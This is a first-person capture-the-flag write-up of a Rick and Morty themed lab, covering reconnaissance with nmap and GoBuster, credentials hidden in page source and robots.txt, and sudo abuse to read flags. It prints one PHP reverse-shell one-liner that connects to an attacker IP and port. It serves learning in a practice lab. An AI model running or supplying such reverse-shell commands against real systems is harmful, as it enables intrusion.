Hello, and thank you for taking the time to read this report. This will be my 4th write up.
“This Rick and Morty themed challenge requires you to exploit a webserver in order to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.”
I started with a basic nmap scan to make sure there weren't any other web services being hosted on a different port. There weren't, so I headed right into the site!
Here we see a message from Rick! We’ve been given our task! From here, I run GoBuster so I can draw out any interesting sub directories with specific extensions. This can provide us with a variety of methods, including the discovery of some sort of vector, to gain access.
During the scan, I see we already have a few interesting options to visit. We have a log in page!
From here, we have to acquire a user and password list to potentially brute force against. Lets do some more investigating.
I decided to navigate back to the home page and had a look around with the inspector tools. Knowing Rick, I knew this is where he’d hide a clue for us. We’ve found our user. Lets try and look for any clues on passwords!
Here we see Rick’s famous quote on the robots.txt page! It actually translates to, “I am in great pain, please help me!” according to Birdperson. No worries Rick, we are one step closer to saving you.
Seems like his catchphrase worked as a password for us; we have logged in! Here we have the possibility of user input which can be interpreted as commands!
From here, I decide to attempt to spawn a reverse shell.
php -r '$sock=fsockopen("10.6.43.46",4444);exec("/bin/sh -i <&4 >&4 2>&4");Voila! A reverse shell has been spawned as “www-data!”
First ingredient found! I thought ahead and was sure of what I could run with sudo privileges; it seems we have no restraint on what we can ask for as this user. A simple “ls” command revealed the “.txt” document that held the first flag!
I didn't think the 2nd ingredient had to be accessed by root, but I still used “sudo -u” as root to run the “cat” command. Since the filename has spaces, I wrote it within quotations.
Again, I used “sudo -u” to run the following “ls” command as root. This allows me to display the contents of this directory. Then, I tried to use the “cat” command. I wasn't able to, so I used “head” instead, specified the path of the file, and finished with “sudo -u” to run everything as root. With this, we have successfully saved Rick and brought him back to his human form.
Thank you for reading!
